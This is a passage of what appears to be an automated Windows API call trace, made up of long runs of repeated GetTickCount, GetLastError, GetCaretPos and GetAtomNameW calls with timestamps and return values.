0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.694] GetTickCount () returned 0x11507ed [0113.694] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.695] GetLastError () returned 0x0 [0113.695] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.696] GetLastError () returned 0x0 [0113.696] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.697] GetTickCount () returned 0x11507ed [0113.697] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.698] GetTickCount () returned 0x11507ed [0113.698] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.699] GetTickCount () returned 0x11507ed [0113.699] GetLastError () returned 0x0 [0113.700] GetTickCount () returned 0x11507ed [0113.700] GetLastError () returned 0x0 [0113.700] GetTickCount () returned 0x11507ed [0113.700] GetLastError () returned 0x0 [0113.700] GetTickCount () returned 0x11507ed [0113.700] GetLastError () returned 0x0 [0113.700] GetTickCount () returned 0x11507ed [0113.700] GetLastError () returned 0x0 [0113.700] GetTickCount () returned 0x11507ed [0113.700] GetLastError () returned 0x0 [0113.700] GetTickCount () returned 0x11507ed [0113.700] GetLastError () returned 0x0 [0113.700] GetTickCount () returned 0x11507ed [0113.700] GetLastError () returned 0x0 [0113.700] GetTickCount () returned 0x11507ed [0113.700] GetLastError () returned 0x0 [0113.700] GetTickCount () returned 0x11507ed [0113.700] GetLastError () returned 0x0 [0113.854] lstrlenA (lpString="") returned 0 [0113.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.854] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.854] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.855] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.855] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.856] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.856] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.857] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.857] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.858] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.858] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.859] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.859] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0113.860] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0113.860] GetAtomNameW (in: nAtom=0x0, 